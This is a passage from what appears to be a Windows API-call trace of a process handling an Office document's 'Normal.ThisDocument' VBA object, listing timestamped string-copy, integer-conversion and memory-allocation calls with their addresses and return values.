(This=0x7ffd098ff3f0, cb=0x15) returned 0x1d39818b510 [0232.251] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="1Normal.ThisDocument", cchWideChar=21, lpMultiByteStr=0x1d39818b510, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="1Normal.ThisDocument", lpUsedDefaultChar=0x0) returned 21 [0232.251] _mbscpy_s (in: _Dst=0x7ffce0c08500, _DstSizeInBytes=0x400, _Src=0x7ffce0bc35f8 | out: _Dst=0x7ffce0c08500) returned 0x0 [0232.251] _mbscpy_s (in: _Dst=0x7ffce0c0850a, _DstSizeInBytes=0x3f6, _Src=0x7ffce0bc3608 | out: _Dst=0x7ffce0c0850a) returned 0x0 [0232.251] _mbscpy_s (in: _Dst=0x7ffce0c08515, _DstSizeInBytes=0x3eb, _Src=0x1d39818b510 | out: _Dst=0x7ffce0c08515) returned 0x0 [0232.252] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39818b510) [0232.252] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d3a453e1e0) [0232.252] _mbscpy_s (in: _Dst=0x7ffce0c08500, _DstSizeInBytes=0x400, _Src=0x7ffce0bc35f8 | out: _Dst=0x7ffce0c08500) returned 0x0 [0232.252] _mbscpy_s (in: _Dst=0x7ffce0c0850a, _DstSizeInBytes=0x3f6, _Src=0x7ffce0bc37a8 | out: _Dst=0x7ffce0c0850a) returned 0x0 [0232.252] _mbscpy_s (in: _Dst=0x7ffce0c0851f, _DstSizeInBytes=0x3e1, _Src=0x7ffce0bc3278 | out: _Dst=0x7ffce0c0851f) returned 0x0 [0232.252] _mbscpy_s (in: _Dst=0x7ffce0c08500, _DstSizeInBytes=0x400, _Src=0x7ffce0bc35f8 | out: _Dst=0x7ffce0c08500) returned 0x0 [0232.252] _mbscpy_s (in: _Dst=0x7ffce0c0850a, _DstSizeInBytes=0x3f6, _Src=0x7ffce0bc3620 | out: _Dst=0x7ffce0c0850a) returned 0x0 [0232.252] _mbscpy_s (in: _Dst=0x7ffce0c08519, _DstSizeInBytes=0x3e7, _Src=0x7ffce0bc3278 | out: _Dst=0x7ffce0c08519) returned 0x0 [0232.252] _mbscpy_s (in: _Dst=0x7ffce0c08500, _DstSizeInBytes=0x400, _Src=0x7ffce0bc35f8 | out: _Dst=0x7ffce0c08500) returned 0x0 [0232.252] _mbscpy_s (in: _Dst=0x7ffce0c0850a, _DstSizeInBytes=0x3f6, _Src=0x7ffce0bc36f8 | out: _Dst=0x7ffce0c0850a) returned 0x0 [0232.252] _mbscpy_s (in: _Dst=0x7ffce0c0851d, _DstSizeInBytes=0x3e3, _Src=0x7ffce0bc354c | out: _Dst=0x7ffce0c0851d) returned 0x0 [0232.252] _mbscpy_s (in: _Dst=0x7ffce0c08500, _DstSizeInBytes=0x400, _Src=0x7ffce0bc35f8 | out: _Dst=0x7ffce0c08500) returned 0x0 [0232.252] _mbscpy_s (in: _Dst=0x7ffce0c0850a, _DstSizeInBytes=0x3f6, _Src=0x7ffce0bc3650 | out: _Dst=0x7ffce0c0850a) returned 0x0 [0232.252] _mbscpy_s (in: _Dst=0x7ffce0c08517, _DstSizeInBytes=0x3e9, _Src=0x7ffce0bc354c | out: _Dst=0x7ffce0c08517) returned 0x0 [0232.252] _mbscpy_s (in: _Dst=0x7ffce0c08500, _DstSizeInBytes=0x400, _Src=0x7ffce0bc35f8 | out: _Dst=0x7ffce0c08500) returned 0x0 [0232.252] _mbscpy_s (in: _Dst=0x7ffce0c0850a, _DstSizeInBytes=0x3f6, _Src=0x7ffce0bc3720 | out: _Dst=0x7ffce0c0850a) returned 0x0 [0232.252] _mbscpy_s (in: _Dst=0x7ffce0c0851f, _DstSizeInBytes=0x3e1, _Src=0x7ffce0bc354c | out: _Dst=0x7ffce0c0851f) returned 0x0 [0232.252] _mbscpy_s (in: _Dst=0x7ffce0c08500, _DstSizeInBytes=0x400, _Src=0x7ffce0bc35f8 | out: _Dst=0x7ffce0c08500) returned 0x0 [0232.252] _mbscpy_s (in: _Dst=0x7ffce0c0850a, _DstSizeInBytes=0x3f6, _Src=0x7ffce0bc3630 | out: _Dst=0x7ffce0c0850a) returned 0x0 [0232.252] _mbscpy_s (in: _Dst=0x7ffce0c0851c, _DstSizeInBytes=0x3e4, _Src=0x7ffce0bc354c | out: _Dst=0x7ffce0c0851c) returned 0x0 [0232.253] _mbscpy_s (in: _Dst=0x1d3986a09d0, _DstSizeInBytes=0x400, _Src=0x1d3a3172b3a | out: _Dst=0x1d3986a09d0) returned 0x0 [0232.253] _mbscpy_s (in: _Dst=0x1d3986a09d0, _DstSizeInBytes=0x400, _Src=0x1d3a3172b6a | out: _Dst=0x1d3986a09d0) returned 0x0 [0232.253] _mbscpy_s (in: _Dst=0x1d3986a09d0, _DstSizeInBytes=0x400, _Src=0x1d3a3172b92 | out: _Dst=0x1d3986a09d0) returned 0x0 [0232.254] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0xe) returned 0x1d39818b3d0 [0232.254] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39818b3d0) [0232.254] _mbscpy_s (in: _Dst=0x1d3986a09d0, _DstSizeInBytes=0x400, _Src=0x1d3a3172b6a | out: _Dst=0x1d3986a09d0) returned 0x0 [0232.254] _mbscpy_s (in: _Dst=0x1d3986a09d0, _DstSizeInBytes=0x400, _Src=0x1d3a3172bba | out: _Dst=0x1d3986a09d0) returned 0x0 [0232.254] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0xa) returned 0x1d39818b7d0 [0232.254] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39818b7d0) [0232.254] _mbscpy_s (in: _Dst=0x1d3986a09d0, _DstSizeInBytes=0x400, _Src=0x1d3a3172b92 | out: _Dst=0x1d3986a09d0) returned 0x0 [0232.254] _mbscpy_s (in: _Dst=0x1d3986a09d0, _DstSizeInBytes=0x400, _Src=0x1d3a3172b6a | out: _Dst=0x1d3986a09d0) returned 0x0 [0232.254] _mbscpy_s (in: _Dst=0x1d3986a09d0, _DstSizeInBytes=0x400, _Src=0x1d3a3172bea | out: _Dst=0x1d3986a09d0) returned 0x0 [0232.254] _mbscpy_s (in: _Dst=0x1d3986a09d0, _DstSizeInBytes=0x400, _Src=0x1d3a3172c1a | out: _Dst=0x1d3986a09d0) returned 0x0 [0232.254] _mbscpy_s (in: _Dst=0x1d3986a09d0, _DstSizeInBytes=0x400, _Src=0x1d3a3172c3e | out: _Dst=0x1d3986a09d0) returned 0x0 [0232.254] _mbscpy_s (in: _Dst=0x1d3986a09d0, _DstSizeInBytes=0x400, _Src=0x1d3a3172c62 | out: _Dst=0x1d3986a09d0) returned 0x0 [0232.254] _mbscpy_s (in: _Dst=0x1d3986a09d0, _DstSizeInBytes=0x400, _Src=0x1d3a3172c86 | out: _Dst=0x1d3986a09d0) returned 0x0 [0232.254] _mbscpy_s (in: _Dst=0x1d3986a09d0, _DstSizeInBytes=0x400, _Src=0x1d3a3172caa | out: _Dst=0x1d3986a09d0) returned 0x0 [0232.254] _mbscpy_s (in: _Dst=0x1d3986a09d0, _DstSizeInBytes=0x400, _Src=0x1d3a3172cce | out: _Dst=0x1d3986a09d0) returned 0x0 [0232.254] _mbscpy_s (in: _Dst=0x1d3986a09d0, _DstSizeInBytes=0x400, _Src=0x1d3a3172cf2 | out: _Dst=0x1d3986a09d0) returned 0x0 [0232.254] _mbscpy_s (in: _Dst=0x1d3986a09d0, _DstSizeInBytes=0x400, _Src=0x1d3a3172d16 | out: _Dst=0x1d3986a09d0) returned 0x0 [0232.254] _i64toa_s (in: _Value=1, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=10 | out: _Buffer="1") returned 0x0 [0232.254] strnlen (_Str="1", _MaxCount=0x18) returned 0x1 [0232.254] _mbscpy_s (in: _Dst=0x1d3986a09d0, _DstSizeInBytes=0x400, _Src=0x1d3a3172cce | out: _Dst=0x1d3986a09d0) returned 0x0 [0232.254] _mbscpy_s (in: _Dst=0x1d3986a09d0, _DstSizeInBytes=0x400, _Src=0x1d3a3172d3a | out: _Dst=0x1d3986a09d0) returned 0x0 [0232.254] _mbscpy_s (in: _Dst=0x1d3986a09d0, _DstSizeInBytes=0x400, _Src=0x1d3a3172d6a | out: _Dst=0x1d3986a09d0) returned 0x0 [0232.254] _mbscpy_s (in: _Dst=0x1d3986a09d0, _DstSizeInBytes=0x400, _Src=0x1d3a3172d92 | out: _Dst=0x1d3986a09d0) returned 0x0 [0232.254] _mbscpy_s (in: _Dst=0x1d3986a09d0, _DstSizeInBytes=0x400, _Src=0x1d3a3172dba | out: _Dst=0x1d3986a09d0) returned 0x0 [0232.255] _mbscpy_s (in: _Dst=0x1d3986a09d0, _DstSizeInBytes=0x400, _Src=0x1d3a3172de2 | out: _Dst=0x1d3986a09d0) returned 0x0 [0232.255] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x12) returned 0x1d39818b7d0 [0232.255] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39818b7d0) [0232.255] _mbscpy_s (in: _Dst=0x1d3986a09d0, _DstSizeInBytes=0x400, _Src=0x1d3a3172cf2 | out: _Dst=0x1d3986a09d0) returned 0x0 [0232.255] _mbscpy_s (in: _Dst=0x1d3986a09d0, _DstSizeInBytes=0x400, _Src=0x1d3a3172bba | out: _Dst=0x1d3986a09d0) returned 0x0 [0232.255] _mbscpy_s (in: _Dst=0x1d3986a09d0, _DstSizeInBytes=0x400, _Src=0x1d3a3172e12 | out: _Dst=0x1d3986a09d0) returned 0x0 [0232.255] _i64toa_s (in: _Value=88395, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=10 | out: _Buffer="88395") returned 0x0 [0232.255] strnlen (_Str="88395", _MaxCount=0x18) returned 0x5 [0232.260] _i64toa_s (in: _Value=1065, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=16 | out: _Buffer="429") returned 0x0 [0232.260] strnlen (_Str="429", _MaxCount=0x18) returned 0x3 [0232.261] _i64toa_s (in: _Value=6659, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=10 | out: _Buffer="6659") returned 0x0 [0232.261] strnlen (_Str="6659", _MaxCount=0x18) returned 0x4 [0232.261] _i64toa_s (in: _Value=6763, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=16 | out: _Buffer="1a6b") returned 0x0 [0232.261] strnlen (_Str="1A6B", _MaxCount=0x18) returned 0x4 [0232.261] _i64toa_s (in: _Value=5652, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=10 | out: _Buffer="5652") returned 0x0 [0232.261] strnlen (_Str="5652", _MaxCount=0x18) returned 0x4 [0232.261] _i64toa_s (in: _Value=5753, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=16 | out: _Buffer="1679") returned 0x0 [0232.261] strnlen (_Str="1679", _MaxCount=0x18) returned 0x4 [0232.261] _i64toa_s (in: _Value=111348, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=10 | out: _Buffer="111348") returned 0x0 [0232.261] strnlen (_Str="111348", _MaxCount=0x18) returned 0x6 [0232.261] _i64toa_s (in: _Value=1031, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=16 | out: _Buffer="407") returned 0x0 [0232.261] strnlen (_Str="407", _MaxCount=0x18) returned 0x3 [0232.261] _i64toa_s (in: _Value=2738, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=10 | out: _Buffer="2738") returned 0x0 [0232.261] strnlen (_Str="2738", _MaxCount=0x18) returned 0x4 [0232.261] _i64toa_s (in: _Value=2846, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=16 | out: _Buffer="b1e") returned 0x0 [0232.262] strnlen (_Str="B1E", _MaxCount=0x18) returned 0x3 [0232.262] _i64toa_s (in: _Value=136114, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=10 | out: _Buffer="136114") returned 0x0 [0232.262] strnlen (_Str="136114", _MaxCount=0x18) returned 0x6 [0232.262] _i64toa_s (in: _Value=2959, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=16 | out: _Buffer="b8f") returned 0x0 [0232.262] strnlen (_Str="B8F", _MaxCount=0x18) returned 0x3 [0232.262] _i64toa_s (in: _Value=195715, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=10 | out: _Buffer="195715") returned 0x0 [0232.262] strnlen (_Str="195715", _MaxCount=0x18) returned 0x6 [0232.262] _i64toa_s (in: _Value=3011, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=16 | out: _Buffer="bc3") returned 0x0 [0232.262] strnlen (_Str="BC3", _MaxCount=0x18) returned 0x3 [0232.262] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x800) returned 0x1d3a40cb1d0 [0232.262] _i64toa_s (in: _Value=1097488, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=10 | out: _Buffer="1097488") returned 0x0 [0232.262] strnlen (_Str="1097488", _MaxCount=0x18) returned 0x7 [0232.262] _i64toa_s (in: _Value=9799, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=16 | out: _Buffer="2647") returned 0x0 [0232.263] strnlen (_Str="2647", _MaxCount=0x18) returned 0x4 [0232.263] _i64toa_s (in: _Value=2672, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=10 | out: _Buffer="2672") returned 0x0 [0232.263] strnlen (_Str="2672", _MaxCount=0x18) returned 0x4 [0232.263] _i64toa_s (in: _Value=2784, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=16 | out: _Buffer="ae0") returned 0x0 [0232.263] strnlen (_Str="AE0", _MaxCount=0x18) returned 0x3 [0232.263] _i64toa_s (in: _Value=175932, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=10 | out: _Buffer="175932") returned 0x0 [0232.263] strnlen (_Str="175932", _MaxCount=0x18) returned 0x6 [0232.263] _i64toa_s (in: _Value=1629, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=16 | out: _Buffer="65d") returned 0x0 [0232.263] strnlen (_Str="65D", _MaxCount=0x18) returned 0x3 [0232.263] _i64toa_s (in: _Value=430710, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=10 | out: _Buffer="430710") returned 0x0 [0232.263] strnlen (_Str="430710", _MaxCount=0x18) returned 0x6 [0232.263] _i64toa_s (in: _Value=4102, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=16 | out: _Buffer="1006") returned 0x0 [0232.263] strnlen (_Str="1006", _MaxCount=0x18) returned 0x4 [0232.263] _i64toa_s (in: _Value=705672, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=10 | out: _Buffer="705672") returned 0x0 [0232.263] strnlen (_Str="705672", _MaxCount=0x18) returned 0x6 [0232.264] _i64toa_s (in: _Value=7128, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=16 | out: _Buffer="1bd8") returned 0x0 [0232.264] strnlen (_Str="1BD8", _MaxCount=0x18) returned 0x4 [0232.264] _i64toa_s (in: _Value=6236, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=10 | out: _Buffer="6236") returned 0x0 [0232.264] strnlen (_Str="6236", _MaxCount=0x18) returned 0x4 [0232.264] _i64toa_s (in: _Value=6333, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=16 | out: _Buffer="18bd") returned 0x0 [0232.264] strnlen (_Str="18BD", _MaxCount=0x18) returned 0x4 [0232.264] _i64toa_s (in: _Value=215876, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=10 | out: _Buffer="215876") returned 0x0 [0232.264] strnlen (_Str="215876", _MaxCount=0x18) returned 0x6 [0232.264] _i64toa_s (in: _Value=1861, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=16 | out: _Buffer="745") returned 0x0 [0232.264] strnlen (_Str="745", _MaxCount=0x18) returned 0x3 [0232.264] IMalloc:Realloc (This=0x7ffd098ff3f0, pv=0x1d3a40cb1d0, cb=0xc00) returned 0x1d39d8545a0 [0232.264] _i64toa_s (in: _Value=84840, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=10 | out: _Buffer="84840") returned 0x0 [0232.264] strnlen (_Str="84840", _MaxCount=0x18) returned 0x5 [0232.264] _i64toa_s (in: _Value=808, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=16 | out: _Buffer="328") returned 0x0 [0232.264] strnlen (_Str="328", _MaxCount=0x18) returned 0x3 [0232.264] _i64toa_s (in: _Value=1005438, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=10 | out: _Buffer="1005438") returned 0x0 [0232.265] strnlen (_Str="1005438", _MaxCount=0x18) returned 0x7 [0232.265] _i64toa_s (in: _Value=9058, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=16 | out: _Buffer="2362") returned 0x0 [0232.265] strnlen (_Str="2362", _MaxCount=0x18) returned 0x4 [0232.265] _i64toa_s (in: _Value=863830, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=10 | out: _Buffer="863830") returned 0x0 [0232.265] strnlen (_Str="863830", _MaxCount=0x18) returned 0x6 [0232.265] _i64toa_s (in: _Value=7853, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=16 | out: _Buffer="1ead") returned 0x0 [0232.265] strnlen (_Str="1EAD", _MaxCount=0x18) returned 0x4 [0232.265] _mbscpy_s (in: _Dst=0x1d3986a09d0, _DstSizeInBytes=0x400, _Src=0x1d3a3172e12 | out: _Dst=0x1d3986a09d0) returned 0x0 [0232.265] _mbscpy_s (in: _Dst=0x1d3986a09d0, _DstSizeInBytes=0x400, _Src=0x1d3a3172e3a | out: _Dst=0x1d3986a09d0) returned 0x0 [0232.265] _mbscpy_s (in: _Dst=0x1d3986a09d0, _DstSizeInBytes=0x400, _Src=0x1d3a3172e3a | out: _Dst=0x1d3986a09d0) returned 0x0 [0232.265] _mbscpy_s (in: _Dst=0x1d3986a09d0, _DstSizeInBytes=0x400, _Src=0x1d3a3172e3a | out: _Dst=0x1d3986a09d0) returned 0x0 [0232.265] _mbscpy_s (in: _Dst=0x1d3986a09d0, _DstSizeInBytes=0x400, _Src=0x1d3a3172e3a | out: _Dst=0x1d3986a09d0) returned 0x0 [0232.265] _mbscpy_s (in: _Dst=0x1d3986a09d0, _DstSizeInBytes=0x400, _Src=0x1d3a3172e3a | out: _Dst=0x1d3986a09d0) returned 0x0 [0232.265] _mbscpy_s (in: _Dst=0x1d3986a09d0, _DstSizeInBytes=0x400, _Src=0x1d3a3172e3a | out: _Dst=0x1d3986a09d0) returned 0x0 [0232.265] _mbscpy_s (in: _Dst=0x1d3986a09d0, _DstSizeInBytes=0x400, _Src=0x1d3a3172e3a | out: _Dst=0x1d3986a09d0) returned 0x0 [0232.265] _mbscpy_s (in: _Dst=0x1d3986a09d0, _DstSizeInBytes=0x400, _Src=0x1d3a3172e3a | out: _Dst=0x1d3986a09d0) returned 0x0 [0232.265] _mbscpy_s (in: _Dst=0x1d3986a09d0, _DstSizeInBytes=0x400, _Src=0x1d3a3172e3a | out: _Dst=0x1d3986a09d0) returned 0x0 [0232.265] _mbscpy_s (in: _Dst=0x1d3986a09d0, _DstSizeInBytes=0x400, _Src=0x1d3a3172e3a | out: _Dst=0x1d3986a09d0) returned 0x0 [0232.265] _mbscpy_s (in: _Dst=0x1d3986a09d0, _DstSizeInBytes=0x400, _Src=0x1d3a3172e3a | out: _Dst=0x1d3986a09d0) returned 0x0 [0232.265] _mbscpy_s (in: _Dst=0x1d3986a09d0, _DstSizeInBytes=0x400, _Src=0x1d3a3172e3a | out: _Dst=0x1d3986a09d0) returned 0x0 [0232.265] _mbscpy_s (in: _Dst=0x1d3986a09d0, _DstSizeInBytes=0x400, _Src=0x1d3a3172e3a | out: _Dst=0x1d3986a09d0) returned 0x0 [0232.265] _mbscpy_s (in: _Dst=0x1d3986a09d0, _DstSizeInBytes=0x400, _Src=0x1d3a3172e3a | out: _Dst=0x1d3986a09d0) returned 0x0 [0232.265] _mbscpy_s (in: _Dst=0x1d3986a09d0, _DstSizeInBytes=0x400, _Src=0x1d3a3172e3a | out: _Dst=0x1d3986a09d0) returned 0x0 [0232.265] _mbscpy_s (in: _Dst=0x1d3986a09d0, _DstSizeInBytes=0x400, _Src=0x1d3a3172e3a | out: _Dst=0x1d3986a09d0) returned 0x0 [0232.265] _mbscpy_s (in: _Dst=0x1d3986a09d0, _DstSizeInBytes=0x400, _Src=0x1d3a3172e3a | out: _Dst=0x1d3986a09d0) returned 0x0 [0232.266] _mbscpy_s (in: _Dst=0x1d3986a09d0, _DstSizeInBytes=0x400, _Src=0x1d3a3172caa | out: _Dst=0x1d3986a09d0) returned 0x0 [0232.266] _mbscpy_s (in: _Dst=0x1d3986a09d0, _DstSizeInBytes=0x400, _Src=0x1d3a3172bba | out: _Dst=0x1d3986a09d0) returned 0x0 [0232.266] _mbscpy_s (in: _Dst=0x1d3986a09d0, _DstSizeInBytes=0x400, _Src=0x1d3a3172e12 | out: _Dst=0x1d3986a09d0) returned 0x0 [0232.266] _i64toa_s (in: _Value=649152, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=10 | out: _Buffer="649152") returned 0x0 [0232.266] strnlen (_Str="649152", _MaxCount=0x18) returned 0x6 [0232.266] _i64toa_s (in: _Value=7056, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=16 | out: _Buffer="1b90") returned 0x0 [0232.266] strnlen (_Str="1B90", _MaxCount=0x18) returned 0x4 [0232.266] _i64toa_s (in: _Value=666540, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=10 | out: _Buffer="666540") returned 0x0 [0232.266] strnlen (_Str="666540", _MaxCount=0x18) returned 0x6 [0232.266] _i64toa_s (in: _Value=5796, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=16 | out: _Buffer="16a4") returned 0x0 [0232.266] strnlen (_Str="16A4", _MaxCount=0x18) returned 0x4 [0232.266] _i64toa_s (in: _Value=338240, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=10 | out: _Buffer="338240") returned 0x0 [0232.266] strnlen (_Str="338240", _MaxCount=0x18) returned 0x6 [0232.266] _i64toa_s (in: _Value=3020, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=16 | out: _Buffer="bcc") returned 0x0 [0232.266] strnlen (_Str="BCC", _MaxCount=0x18) returned 0x3 [0232.266] _i64toa_s (in: _Value=15651, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=10 | out: _Buffer="15651") returned 0x0 [0232.267] strnlen (_Str="15651", _MaxCount=0x18) returned 0x5 [0232.267] _i64toa_s (in: _Value=141, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=16 | out: _Buffer="8d") returned 0x0 [0232.267] strnlen (_Str="8D", _MaxCount=0x18) returned 0x2 [0232.267] _i64toa_s (in: _Value=879768, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=10 | out: _Buffer="879768") returned 0x0 [0232.267] strnlen (_Str="879768", _MaxCount=0x18) returned 0x6 [0232.267] _i64toa_s (in: _Value=8146, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=16 | out: _Buffer="1fd2") returned 0x0 [0232.267] strnlen (_Str="1FD2", _MaxCount=0x18) returned 0x4 [0232.267] _i64toa_s (in: _Value=52325, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=10 | out: _Buffer="52325") returned 0x0 [0232.267] strnlen (_Str="52325", _MaxCount=0x18) returned 0x5 [0232.267] _i64toa_s (in: _Value=455, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=16 | out: _Buffer="1c7") returned 0x0 [0232.267] strnlen (_Str="1C7", _MaxCount=0x18) returned 0x3 [0232.267] _i64toa_s (in: _Value=1017986, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=10 | out: _Buffer="1017986") returned 0x0 [0232.268] strnlen (_Str="1017986", _MaxCount=0x18) returned 0x7 [0232.268] _i64toa_s (in: _Value=8627, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=16 | out: _Buffer="21b3") returned 0x0 [0232.268] strnlen (_Str="21B3", _MaxCount=0x18) returned 0x4 [0232.268] _i64toa_s (in: _Value=377336, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=10 | out: _Buffer="377336") returned 0x0 [0232.268] strnlen (_Str="377336", _MaxCount=0x18) returned 0x6 [0232.268] _i64toa_s (in: _Value=3736, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=16 | out: _Buffer="e98") returned 0x0 [0232.268] strnlen (_Str="E98", _MaxCount=0x18) returned 0x3 [0232.268] _i64toa_s (in: _Value=8669, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=10 | out: _Buffer="8669") returned 0x0 [0232.268] strnlen (_Str="8669", _MaxCount=0x18) returned 0x4 [0232.268] _i64toa_s (in: _Value=8715, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=16 | out: _Buffer="220b") returned 0x0 [0232.268] strnlen (_Str="220B", _MaxCount=0x18) returned 0x4 [0232.268] _i64toa_s (in: _Value=959197, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=10 | out: _Buffer="959197") returned 0x0 [0232.268] strnlen (_Str="959197", _MaxCount=0x18) returned 0x6 [0232.268] _i64toa_s (in: _Value=9497, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=16 | out: _Buffer="2519") returned 0x0 [0232.269] strnlen (_Str="2519", _MaxCount=0x18) returned 0x4 [0232.269] _i64toa_s (in: _Value=630000, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=10 | out: _Buffer="630000") returned 0x0 [0232.269] strnlen (_Str="630000", _MaxCount=0x18) returned 0x6 [0232.269] _i64toa_s (in: _Value=5250, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=16 | out: _Buffer="1482") returned 0x0 [0232.269] strnlen (_Str="1482", _MaxCount=0x18) returned 0x4 [0232.269] _i64toa_s (in: _Value=54136, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=10 | out: _Buffer="54136") returned 0x0 [0232.269] strnlen (_Str="54136", _MaxCount=0x18) returned 0x5 [0232.269] _i64toa_s (in: _Value=536, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=16 | out: _Buffer="218") returned 0x0 [0232.269] strnlen (_Str="218", _MaxCount=0x18) returned 0x3 [0232.269] _mbscpy_s (in: _Dst=0x1d3986a09d0, _DstSizeInBytes=0x400, _Src=0x1d3a3172c86 | out: _Dst=0x1d3986a09d0) returned 0x0 [0232.269] _mbscpy_s (in: _Dst=0x1d3986a09d0, _DstSizeInBytes=0x400, _Src=0x1d3a3172b92 | out: _Dst=0x1d3986a09d0) returned 0x0 [0232.269] _mbscpy_s (in: _Dst=0x1d3986a09d0, _DstSizeInBytes=0x400, _Src=0x1d3a3172e3a | out: _Dst=0x1d3986a09d0) returned 0x0 [0232.269] _mbscpy_s (in: _Dst=0x1d3986a09d0, _DstSizeInBytes=0x400, _Src=0x1d3a3172e3a | out: _Dst=0x1d3986a09d0) returned 0x0 [0232.269] _mbscpy_s (in: _Dst=0x1d3986a09d0, _DstSizeInBytes=0x400, _Src=0x1d3a3172e3a | out: _Dst=0x1d3986a09d0) returned 0x0 [0232.269] _mbscpy_s (in: _Dst=0x1d3986a09d0, _DstSizeInBytes=0x400, _Src=0x1d3a3172e3a | out: _Dst=0x1d3986a09d0) returned 0x0 [0232.269] _mbscpy_s (in: _Dst=0x1d3986a09d0, _DstSizeInBytes=0x400, _Src=0x1d3a3172e3a | out: _Dst=0x1d3986a09d0) returned 0x0 [0232.269] _mbscpy_s (in: _Dst=0x1d3986a09d0, _DstSizeInBytes=0x400, _Src=0x1d3a3172e3a | out: _Dst=0x1d3986a09d0) returned 0x0 [0232.269] _mbscpy_s (in: _Dst=0x1d3986a09d0, _DstSizeInBytes=0x400, _Src=0x1d3a3172e3a | out: _Dst=0x1d3986a09d0) returned 0x0 [0232.269] _mbscpy_s (in: _Dst=0x1d3986a09d0, _DstSizeInBytes=0x400, _Src=0x1d3a3172e3a | out: _Dst=0x1d3986a09d0) returned 0x0 [0232.269] _mbscpy_s (in: _Dst=0x1d3986a09d0, _DstSizeInBytes=0x400, _Src=0x1d3a3172e3a | out: _Dst=0x1d3986a09d0) returned 0x0 [0232.269] _mbscpy_s (in: _Dst=0x1d3986a09d0, _DstSizeInBytes=0x400, _Src=0x1d3a3172e3a | out: _Dst=0x1d3986a09d0) returned 0x0 [0232.269] _mbscpy_s (in: _Dst=0x1d3986a09d0, _DstSizeInBytes=0x400, _Src=0x1d3a3172e3a | out: _Dst=0x1d3986a09d0) returned 0x0 [0232.269] _mbscpy_s (in: _Dst=0x1d3986a09d0, _DstSizeInBytes=0x400, _Src=0x1d3a3172e3a | out: _Dst=0x1d3986a09d0) returned 0x0 [0232.269] _i64toa_s (in: _Value=733824, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=10 | out: _Buffer="733824") returned 0x0 [0232.269] strnlen (_Str="733824", _MaxCount=0x18) returned 0x6 [0232.269] _i64toa_s (in: _Value=7056, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=16 | out: _Buffer="1b90") returned 0x0 [0232.269] strnlen (_Str="1B90", _MaxCount=0x18) returned 0x4 [0232.269] _i64toa_s (in: _Value=672336, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=10 | out: _Buffer="672336") returned 0x0 [0232.269] strnlen 